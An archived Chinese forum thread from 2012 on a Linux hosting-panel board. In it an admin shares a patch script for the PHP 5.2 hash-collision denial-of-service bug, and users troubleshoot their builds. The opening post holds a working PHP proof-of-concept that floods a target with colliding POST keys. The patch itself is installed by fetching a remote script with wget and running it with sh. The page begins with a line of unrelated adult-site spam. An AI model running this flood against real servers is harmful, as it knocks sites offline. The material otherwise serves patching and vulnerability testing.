四虎影视在线影院在线观看,小s货再浪些再咬紧点h,国产精品水嫩水嫩,97精产国品一二三产区

Board logo

標題: [發(fā)布] PHP5.2.*防止Hash沖突拒絕服務(wù)攻擊升級腳本 [打印本頁]
作者: admin    時間: 2012-1-4 13:03     標題: PHP5.2.*防止Hash沖突拒絕服務(wù)攻擊升級腳本

ssh登錄終端,執(zhí)行如下

wget http://cd-genova.com/in_scripts/php-52_1130.sh.txt
sh php-52_1130.sh.txt

完成后就可以


已修正
之前升級的,如果出現(xiàn) EA無法使用,可執(zhí)行如下再編譯下EA就可以
cd /tmp
wget -c http://dl.wdlinux.cn:5180/soft/eaccelerator-0.9.5.3.tar.bz2
tar jxvf eaccelerator-0.9.5.3.tar.bz2
cd eaccelerator-0.9.5.3
./configure --enable-eaccelerator=shared --with-eaccelerator-shared-memory --with-php-config=/www/wdlinux/php/bin/php-config
make
make install


此腳本只對wdlinux,一鍵包及wdcp的默認安裝有效,如不是wdlinux的安裝包或有修改目錄的,可做相應(yīng)的修改編譯
或下載php手工編譯


此BUG據(jù)說可以讓CPU100%從而達到拒絕服務(wù),但我在幾個機器上測試,似乎沒有這個問題
這里附上測試程序
  1. <?php
  2. $size = pow(2, 16);
  3. $array = array();
  4. $ch = curl_init();
  5. curl_setopt($ch, CURLOPT_URL, "http://www.xxx.com/index.php");
  6. for ($key = 0, $maxKey = ($size - 1) * $size; $key <= $maxKey; $key += $size) {
  7.         #$array[$key] = 0;
  8.         $argument.="a[".$key."]=0&";
  9. }
  10. curl_setopt($ch, CURLOPT_POST, true);
  11. curl_setopt($ch, CURLOPT_POSTFIELDS, $argument."1=1");
  12. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  13. curl_setopt($ch, CURLOPT_TIMEOUT, '0');
  14. curl_setopt($ch, CURLOPT_USERAGENT, 'API REQUEST(CURL)');

  16. $return['result'] = curl_exec($ch);
  17. $return['code'] = curl_getinfo($ch, CURLINFO_HTTP_CODE);
  18. curl_close($ch);
  19. ?>
復(fù)制代碼

另一個攻擊測試腳本 http://blog.csdn.net/linvo/article/details/7169718

把上面的www.xxx.com 替換為相關(guān)的域名即可
把上面的PHP代碼保存為當前文件如t.php
/www/wdlinux/wdphp/bin/php t.php
就可以看到效果,如果有問題,CPU就會達100%
作者: mingzhao    時間: 2012-1-4 17:06

太感謝了~正愁著嘗試網(wǎng)上的方法都不行~老大就出了腳本
作者: c3a3o3    時間: 2012-1-9 11:03

This build of "eAccelerator" was compiled for PHP version 5.2.17. Rebuild it for your PHP version (5.2.17-p1) or download precompiled binaries.
作者: c3a3o3    時間: 2012-1-9 11:04

ssh登錄終端,執(zhí)行如下

wget
sh php-52_1130.sh.txt

完成后就可以


此腳本只對wdlinux,一鍵包 ...
admin 發(fā)表于 2012-1-4 13:03



    弄好以后  eAccelerator 不能用了
作者: admin    時間: 2012-1-9 12:35

已修正
之前升級的,可執(zhí)行如下再編譯下EA就可以
cd /tmp
wget -c http://dl.wdlinux.cn:5180/soft/eaccelerator-0.9.5.3.tar.bz2
tar jxvf eaccelerator-0.9.5.3.tar.bz2
cd eaccelerator-0.9.5.3
./configure --enable-eaccelerator=shared --with-eaccelerator-shared-memory --with-php-config=/www/wdlinux/php/bin/php-config
make
make install
作者: c3a3o3    時間: 2012-1-9 13:11

已修正
之前升級的,可執(zhí)行如下再編譯下EA就可以
cd /tmp
wget -c
tar jxvf eaccelerator-0.9.5.3.tar ...
admin 發(fā)表于 2012-1-9 12:35



    老大的效率 太高了 謝謝
作者: admin    時間: 2012-1-9 14:35

是前兩天修改過的,你應(yīng)該是早幾天升的吧
作者: c3a3o3    時間: 2012-1-9 15:49

是前兩天修改過的,你應(yīng)該是早幾天升的吧
admin 發(fā)表于 2012-1-9 14:35



   上周六 測試 出現(xiàn) 的問題
作者: al277    時間: 2012-1-18 18:14

這個很給力的說 我就說 怎么網(wǎng)站打開報錯了呢
ssh上去top一看,我靠mysql占用內(nèi)存都120%了。。。。
果斷下補丁 幾分鐘搞定
作者: admin    時間: 2012-1-18 19:40

加上memcache擴展再編譯下
作者: omaman    時間: 2012-1-20 20:54

wdcp_v2.1.2 是不是已經(jīng)打了補丁,不需要單獨再大本文這個補丁?
作者: admin    時間: 2012-1-20 21:38

在此之后的不用
作者: 擋風(fēng)    時間: 2012-2-20 21:46

天天CPU百分百的路過。
作者: doxlzt    時間: 2012-3-9 16:47

學(xué)習(xí) 了,支持老大
作者: 匿名好友    時間: 2012-8-25 02:55

請問老大,8月21的要不要再弄下這個
作者: lotuspool    時間: 2013-10-30 11:16

本帖最后由 lotuspool 于 2013-10-30 11:19 編輯

我的服務(wù)器的php版本是5.2.17, 我想打這個補丁,就現(xiàn)在一臺電腦里做了虛擬機,模擬了服務(wù)器的系統(tǒng)centos5.7系統(tǒng),lnmp也和服務(wù)器設(shè)置和安裝目錄一樣。
php也是5.2.17。wdcp 1.1 。

我用這個腳本在虛擬機系統(tǒng)里打這個補丁,腳本運行很正常,最后完成之后,再去看phpinfo里的信息,已經(jīng)顯示“PHP Version 5.2.17p1”了,再測試漏洞也沒有了。

之后我就去正式服務(wù)器打補丁,正式服務(wù)器腳本運行也正常,最后完成之后,我去看phpinfo里的信息,還是老樣子“PHP Version 5.2.17”,我測試這個漏洞也還存在。

我的wdcp安裝不是默認目錄,腳本下載下來我修改了這個對應(yīng)的目錄,整個腳本運行也沒看到什么報錯。

請問各位高手,有遇到我這種情況的嗎?有哪位兄弟好心幫忙指點一下,不勝感激。
作者: admin    時間: 2013-10-30 15:35

重起一下

可是手動編譯試試
作者: lotuspool    時間: 2013-10-30 15:49

謝謝,我去試試
作者: lotuspool    時間: 2013-10-30 19:03

我去手工編譯了,結(jié)果有報錯:
/tmp/php-5.2.17/ext/iconv/iconv.c:2491: undefined reference to `libiconv_open'
collect2: ld returned 1 exit status
make: *** [sapi/cli/php] Error 1

我去查了資料,有兩個解決方法:
一:編輯Makefile 在crypt 后加上-liconv,
二:make ZEND_EXTRA_LIBS='-liconv'

可是我水平太低,沒看懂這個兩個解決辦法。
第一個辦法,我在make的時候報錯,這時候還沒生成makefile,我怎么去編輯makefile呢?
第二個辦法,是直接在命令行里打這個命令,然后重新./configure 。。。。 ,        make ,這樣嗎?
我試過在命令行里直接運行make ZEND_EXTRA_LIBS='-liconv',然后./configure 。。。。 ,        make , 還是報原來的錯誤。

有哪位好心的兄弟幫我解釋一下這個問題嗎? 萬分感謝。
作者: lotuspool    時間: 2013-10-30 19:42

我剛才這樣做了:
./configure 之后  
make ZEND_EXTRA_LIBS='-liconv',
然后make install ,已經(jīng)成功了。



歡迎光臨 WDlinux官方論壇 (http://cd-genova.com/bbs/) Powered by Discuz! 7.2